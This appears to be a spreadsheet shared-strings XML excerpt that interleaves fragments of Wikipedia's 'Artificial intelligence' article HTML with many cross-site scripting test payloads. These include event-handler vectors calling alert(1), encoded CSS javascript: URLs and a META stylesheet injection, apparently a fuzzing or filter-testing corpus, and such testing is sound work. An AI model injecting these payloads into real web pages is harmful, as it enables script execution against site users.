    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://venturebeat.com/2016/10/22/cant-find-a-perfect-ceo-create-an-ai-one-yourself/"&gt;"Can't find a perfect CEO? Create an AI one yourself" &lt;/a&gt;. 22 October 2016. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=unknown&amp;amp;rft.btitle=Can%27t+find+a+perfect+CEO%3F+Create+an+AI+one+yourself&amp;amp;rft.date=2016-10-22&amp;amp;rft_id=https%3A%2F%2Fventurebeat.com%2F2016%2F10%2F22%2Fcant-find-a-perfect-ceo-create-an-ai-one-yourself%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;blockquote ondblclick="alert(1)"&gt;test&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;xmp onload=alert(1)&gt;&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;command draggable="true" ondrag="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;STYLE&gt;.{background-image:url("javascript:alert('')");}&lt;/STYLE&gt;&lt;A CLASS=&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"&gt;</t>
  </si>
  <si>
    <t>&lt;br id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/br&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;output onbeforecopy="alert(1)" contenteditable&gt;test&lt;/output&gt;</t>
  </si>
  <si>
    <t>&lt;multicol draggable="true" ondragenter="alert(1)"&gt;test&lt;/multicol&gt;</t>
  </si>
  <si>
    <t>&lt;base onmouseenter="alert(1)"&gt;test&lt;/base&gt;</t>
  </si>
  <si>
    <t>&lt;mark onmouseout="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onmouseup="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;details onmouseover="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;&lt;span class="mw-headline" id="Law-related_professions"&gt;Law-related professions </t>
  </si>
  <si>
    <t>&lt;details onclick="alert(1)"&gt;test&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;hgroup id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;thead onmousemove="alert(1)"&gt;test&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Continuous_track" title="Continuous track"&gt;Tracks &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;&lt;a rel="nofollow" class="external text" href="https://betanews.com/2016/10/21/artificial-intelligence-stephen-hawking/"&gt;"Stephen Hawking believes AI could be mankind's last accomplishment" &lt;/a&gt;. &lt;i&gt;BetaNews &lt;/i&gt;. 21 October 2016. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170828183930/https://betanews.com/2016/10/21/artificial-intelligence-stephen-hawking/"&gt;Archived &lt;/a&gt; from the original on 28 August 2017. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=BetaNews&amp;amp;rft.atitle=Stephen+Hawking+believes+AI+could+be+mankind%27s+last+accomplishment&amp;amp;rft.date=2016-10-21&amp;amp;rft_id=https%3A%2F%2Fbetanews.com%2F2016%2F10%2F21%2Fartificial-intelligence-stephen-hawking%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>analytics.ready(function () {</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;q id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;figcaption ondragover=alert(1) contenteditable&gt;drop here&lt;/figcaption&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos2015Chapter_2,_Chapter_3-69"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos2015Chapter_2,_Chapter_3_69-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;h3  id="p-lang-label"&gt;</t>
  </si>
  <si>
    <t>&lt;caption draggable="true" ondragenter="alert(1)"&gt;test&lt;/caption&gt;</t>
  </si>
  <si>
    <t>&lt;xss id=x tabindex=1 onfocusout=alert(1)&gt;&lt;/xss&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;option onpointerleave=alert(1)&gt;XSS&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;body oncontextmenu="alert(1)"&gt;test&lt;/body&gt;</t>
  </si>
  <si>
    <t>Since 2011, fast implementations of CNNs on GPUs have</t>
  </si>
  <si>
    <t>&lt;font id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;Machine perception &lt;/a&gt;, &lt;a href="/wiki/Computer_vision" title="Computer vision"&gt;Computer vision &lt;/a&gt;, and &lt;a href="/wiki/Speech_recognition" title="Speech recognition"&gt;Speech recognition &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Michael Anderson and Susan Leigh Anderson (2011), Machine Ethics, Cambridge University Press. </t>
  </si>
  <si>
    <t>&lt;p onpointerdown=alert(1)&gt;XSS&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;The main categories of networks are acyclic or &lt;a href="/wiki/Feedforward_neural_network" title="Feedforward neural network"&gt;feedforward neural networks &lt;/a&gt; (where the signal passes in only one direction) and &lt;a href="/wiki/Recurrent_neural_network" title="Recurrent neural network"&gt;recurrent neural networks &lt;/a&gt; (which allow feedback and short-term memories of previous input events). Among the most popular feedforward networks are &lt;a href="/wiki/Perceptron" title="Perceptron"&gt;perceptrons &lt;/a&gt;, &lt;a href="/wiki/Multi-layer_perceptron" class="mw-redirect" title="Multi-layer perceptron"&gt;multi-layer perceptrons &lt;/a&gt; and &lt;a href="/wiki/Radial_basis_network" class="mw-redirect" title="Radial basis network"&gt;radial basis networks &lt;/a&gt;.&lt;sup id="cite_ref-Feedforward_neural_networks_237-0" class="reference"&gt;&lt;a href="#cite_note-Feedforward_neural_networks-237"&gt;&amp;#91;226&amp;#93; &lt;/a&gt; &lt;/sup&gt; Neural networks can be applied to the problem of &lt;a href="/wiki/Intelligent_control" title="Intelligent control"&gt;intelligent control &lt;/a&gt; (for robotics) or &lt;a href="/wiki/Machine_learning" title="Machine learning"&gt;learning &lt;/a&gt;, using such techniques as &lt;a href="/wiki/Hebbian_learning" class="mw-redirect" title="Hebbian learning"&gt;Hebbian learning &lt;/a&gt; ("fire together, wire together"), &lt;a href="/wiki/GMDH" class="mw-redirect" title="GMDH"&gt;GMDH &lt;/a&gt; or &lt;a href="/wiki/Competitive_learning" title="Competitive learning"&gt;competitive learning &lt;/a&gt;.&lt;sup id="cite_ref-Learning_in_neural_networks_238-0" class="reference"&gt;&lt;a href="#cite_note-Learning_in_neural_networks-238"&gt;&amp;#91;227&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;strong id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/strong&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dt draggable="true" ondragleave="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;embed onpointerover=alert(1)&gt;XSS&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFNilsson1998"&gt;Nilsson 1998 &lt;/a&gt;, chpt. 6 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;main onbeforepaste="alert(1)" contenteditable&gt;test&lt;/main&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/th&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;div id="catlinks" class="catlinks" data-mw="interface"&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Chinese_room" title="Chinese room"&gt;Chinese room &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;address onload=alert(1)&gt;&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Warren_Sturgis_McCulloch" title="Warren Sturgis McCulloch"&gt;Warren McCulloch &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-50"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-50"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFPooleMackworthGoebel1998"&gt;Poole, Mackworth &amp;amp; Goebel 1998 &lt;/a&gt;, pp.&amp;#160;335–337 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Stoicism" title="Stoicism"&gt;Stoicism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;A HREF="http://66.102.7.147/"&gt;&lt;/A&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;image id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/image&gt;</t>
  </si>
  <si>
    <t>&lt;title onmousedown="alert(1)"&gt;test&lt;/title&gt;</t>
  </si>
  <si>
    <t>&lt;dfn onmouseleave="alert(1)"&gt;test&lt;/dfn&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;&lt;a href="/wiki/Machine_perception" title="Machine perception"&gt;Machine perception &lt;/a&gt;&lt;sup id="cite_ref-Machine_perception_124-0" class="reference"&gt;&lt;a href="#cite_note-Machine_perception-124"&gt;&amp;#91;121&amp;#93; &lt;/a&gt; &lt;/sup&gt; is the ability to use input from sensors (such as cameras (visible spectrum or infrared), microphones, wireless signals, and active &lt;a href="/wiki/Lidar" title="Lidar"&gt;lidar &lt;/a&gt;, sonar, radar, and &lt;a href="/wiki/Tactile_sensor" title="Tactile sensor"&gt;tactile sensors &lt;/a&gt;) to deduce aspects of the world. Applications include &lt;a href="/wiki/Speech_recognition" title="Speech recognition"&gt;speech recognition &lt;/a&gt;,&lt;sup id="cite_ref-Speech_recognition_125-0" class="reference"&gt;&lt;a href="#cite_note-Speech_recognition-125"&gt;&amp;#91;122&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Facial_recognition_system" title="Facial recognition system"&gt;facial recognition &lt;/a&gt;, and &lt;a href="/wiki/Object_recognition" class="mw-redirect" title="Object recognition"&gt;object recognition &lt;/a&gt;.&lt;sup id="cite_ref-Object_recognition_126-0" class="reference"&gt;&lt;a href="#cite_note-Object_recognition-126"&gt;&amp;#91;123&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;a href="/wiki/Computer_vision" title="Computer vision"&gt;Computer vision &lt;/a&gt; is the ability to analyze visual input. Such input is usually ambiguous; a giant, fifty-meter-tall pedestrian far away may produce exactly the same pixels as a nearby normal-sized pedestrian, requiring the AI to judge the relative likelihood and reasonableness of different interpretations, for example by using its "object model" to assess that fifty-meter pedestrians do not exist.&lt;sup id="cite_ref-Computer_vision_127-0" class="reference"&gt;&lt;a href="#cite_note-Computer_vision-127"&gt;&amp;#91;124&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onbeforepaste="alert(1)" contenteditable&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;sub onpointermove=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Classical_planning-112"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Classical_planning_112-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFO&amp;#39;Connor1994" class="citation journal"&gt;O'Connor, Kathleen Malone (1994). &lt;a rel="nofollow" class="external text" href="http://repository.upenn.edu/dissertations/AAI9503804"&gt;"The alchemical creation of life (takwin) and other concepts of Genesis in medieval Islam" &lt;/a&gt;. &lt;i&gt;Dissertations Available from ProQuest &lt;/i&gt;. University of Pennsylvania: 1–435. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Dissertations+Available+from+ProQuest&amp;amp;rft.atitle=The+alchemical+creation+of+life+%28takwin%29+and+other+concepts+of+Genesis+in+medieval+Islam&amp;amp;rft.pages=1-435&amp;amp;rft.date=1994&amp;amp;rft.aulast=O%27Connor&amp;amp;rft.aufirst=Kathleen+Malone&amp;amp;rft_id=http%3A%2F%2Frepository.upenn.edu%2Fdissertations%2FAAI9503804&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;bdo onmouseleave="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;article id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;frame onbeforecut="alert(1)" contenteditable&gt;test&lt;/frame&gt;</t>
  </si>
  <si>
    <t>&lt;meter onblur=alert(1) tabindex=1 id=x&gt;&lt;/meter&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onblur=alert(1) tabindex=1 id=x&gt;&lt;/hgroup&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onclick="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;listing id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Applications_of_artificial_intelligence" title="Applications of artificial intelligence"&gt;Applications of artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;hgroup onmouseout="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Robot_competition" title="Robot competition"&gt;Competitions &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;img ondragover=alert(1) contenteditable&gt;drop here&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;mark ondragover=alert(1) contenteditable&gt;drop here&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;video draggable="true" ondrag="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;thead onpointerleave=alert(1)&gt;XSS&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;isindex onmouseout="alert(1)"&gt;test&lt;/isindex&gt;</t>
  </si>
  <si>
    <t>&lt;font draggable="true" ondragstart="alert(1)"&gt;test&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;aside onkeyup="alert(1)" contenteditable&gt;test&lt;/aside&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;nav id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;204–233, &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">		&lt;li id="footer-info-copyright"&gt;Text is available under the &lt;a rel="license" href="//en.wikipedia.org/wiki/Wikipedia:Text_of_Creative_Commons_Attribution-ShareAlike_3.0_Unported_License"&gt;Creative Commons Attribution-ShareAlike License &lt;/a&gt;&lt;a rel="license" href="//creativecommons.org/licenses/by-sa/3.0/" style="display:none;"&gt; &lt;/a&gt;;</t>
  </si>
  <si>
    <t>&lt;META HTTP-EQUIV="Link" Content="&lt;http://.rocks/.css&gt;; REL=stylesheet"&gt;</t>
  </si>
  <si>
    <t>&lt;mark onmouseleave="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Philosophy_of_engineering" title="Philosophy of engineering"&gt;Engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;picture onbeforecopy="alert(1)" contenteditable&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div id="Robotics" style="font-size:114%;margin:0 4em"&gt;&lt;a href="/wiki/Robotics" title="Robotics"&gt;Robotics &lt;/a&gt; &lt;/div&gt; &lt;/th&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;Main articles &lt;/th&gt;&lt;td class="navbox-list navbox-odd" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Deep_learning" title="Deep learning"&gt;Deep learning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;tr onbeforecopy="alert(1)" contenteditable&gt;test&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;audio onkeyup="alert(1)" contenteditable&gt;test&lt;/audio&gt;</t>
  </si>
  <si>
    <t>&lt;pre id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;link id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;body onfocusout=alert(1) id=x&gt;&lt;iframe id=x&gt;</t>
  </si>
  <si>
    <t>&lt;object data=/ onreadystatechange=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;hgroup style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;ol style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;header id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/header&gt;</t>
  </si>
  <si>
    <t>&lt;iframe id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/iframe&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;i onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/i&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;img2 onpointerout=alert(1)&gt;XSS&lt;/img2&gt;</t>
  </si>
  <si>
    <t>&lt;i onmouseover="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;mark onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/mark&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFBBC_News2006"&gt;&lt;i&gt;BBC News &lt;/i&gt; 2006 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTERussellNorvig20092-2"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTERussellNorvig20092_2-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMoravec1988"&gt;Moravec 1988 &lt;/a&gt; &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite id="CITEREFLangenKatzDempsey1994" class="citation"&gt;Langen, Pauline A.; Katz, Jeffrey S.; Dempsey, Gayle, eds. (18 October 1994), &lt;a rel="nofollow" class="external text" href="https://www.google.com/patents/US5357427"&gt;&lt;i&gt;Remote monitoring of high-risk patients using artificial intelligence &lt;/i&gt; &lt;/a&gt;, &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20170228090520/https://www.google.com/patents/US5357427"&gt;archived &lt;/a&gt; from the original on 28 February 2017&lt;span class="reference-accessdate"&gt;, retrieved &lt;span class="nowrap"&gt;27 February </t>
  </si>
  <si>
    <t>&lt;meter id=x tabindex=1 onactivate=alert(1)&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;style onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/style&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;449–455 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;style oncontextmenu="alert(1)"&gt;test&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;footer draggable="true" ondragend="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>additional terms may apply.  By using this site, you agree to the &lt;a href="//foundation.wikimedia.org/wiki/Terms_of_Use"&gt;Terms of Use &lt;/a&gt; and &lt;a href="//foundation.wikimedia.org/wiki/Privacy_policy"&gt;Privacy Policy &lt;/a&gt;. Wikipedia® is a registered trademark of the &lt;a href="//www.wikimediafoundation.org/"&gt;Wikimedia Foundation, Inc. &lt;/a&gt;, a non-profit organization. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpaste="alert(1)" contenteditable&gt;test&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;abbr id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;table onpointermove=alert(1)&gt;XSS&lt;/table&gt;</t>
  </si>
  <si>
    <t>&lt;image src=validimage.png onload=alert(1)&gt;</t>
  </si>
  <si>
    <t>&lt;p onpaste="alert(1)" contenteditable&gt;test&lt;/p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;body ontouchend=alert(1)&gt; </t>
  </si>
  <si>
    <t>&lt;dd&gt;Many of the things people know take the form of "working assumptions". For example, if a bird comes up in conversation, people typically picture an animal that is fist-sized, sings, and flies. None of these things are true about all birds. &lt;a href="/wiki/John_McCarthy_(computer_scientist)" title="John McCarthy (computer scientist)"&gt;John McCarthy &lt;/a&gt; identified this problem in 1969&lt;sup id="cite_ref-Qualification_problem_104-0" class="reference"&gt;&lt;a href="#cite_note-Qualification_problem-104"&gt;&amp;#91;101&amp;#93; &lt;/a&gt; &lt;/sup&gt; as the qualification problem: for any commonsense rule that AI researchers care to represent, there tend to be a huge number of exceptions. Almost nothing is simply true or false in the way that abstract logic requires. AI research has explored a number of solutions to this problem.&lt;sup id="cite_ref-Default_reasoning_and_non-monotonic_logic_105-0" class="reference"&gt;&lt;a href="#cite_note-Default_reasoning_and_non-monotonic_logic-105"&gt;&amp;#91;102&amp;#93; &lt;/a&gt; &lt;/sup&gt; &lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;marquee onblur=alert(1) tabindex=1 id=x&gt;&lt;/marquee&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-395"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-395"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;data onbeforepaste="alert(1)" contenteditable&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;link oncontextmenu="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;tt style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;tbody draggable="true" ondrag="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;pre id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Animatronics" title="Animatronics"&gt;Animatronic &lt;/a&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Allen_Institute_for_Artificial_Intelligence" class="mw-redirect" title="Allen Institute for Artificial Intelligence"&gt;Allen Institute for Artificial Intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Timeline_of_artificial_intelligence" title="Timeline of artificial intelligence"&gt;Timeline &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;br id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Formal_reasoning-28"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Formal_reasoning_28-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;form ondragover=alert(1) contenteditable&gt;drop here&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;h1 id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;progress onpointerdown=alert(1)&gt;XSS&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;var draggable="true" ondragend="alert(1)"&gt;test&lt;/var&gt;</t>
  </si>
  <si>
    <t>&lt;div class="toclimit-3"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-62"&gt;&lt;a href="#Computationalism_and_functionalism"&gt;&lt;span class="tocnumber"&gt;8.4.2 </t>
  </si>
  <si>
    <t>&lt;command onkeydown="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-132"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-132"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation magazine"&gt;Waddell, Kaveh (2018). &lt;a rel="nofollow" class="external text" href="https://www.theatlantic.com/technology/archive/2017/04/uncanny-valley-digital-assistants/523806/"&gt;"Chatbots Have Entered the Uncanny Valley" &lt;/a&gt;. &lt;i&gt;The Atlantic &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;24 April </t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;div id="bodyContent" class="mw-body-content"&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;main ondrop=alert(1) contenteditable&gt;drop here&lt;/main&gt;</t>
  </si>
  <si>
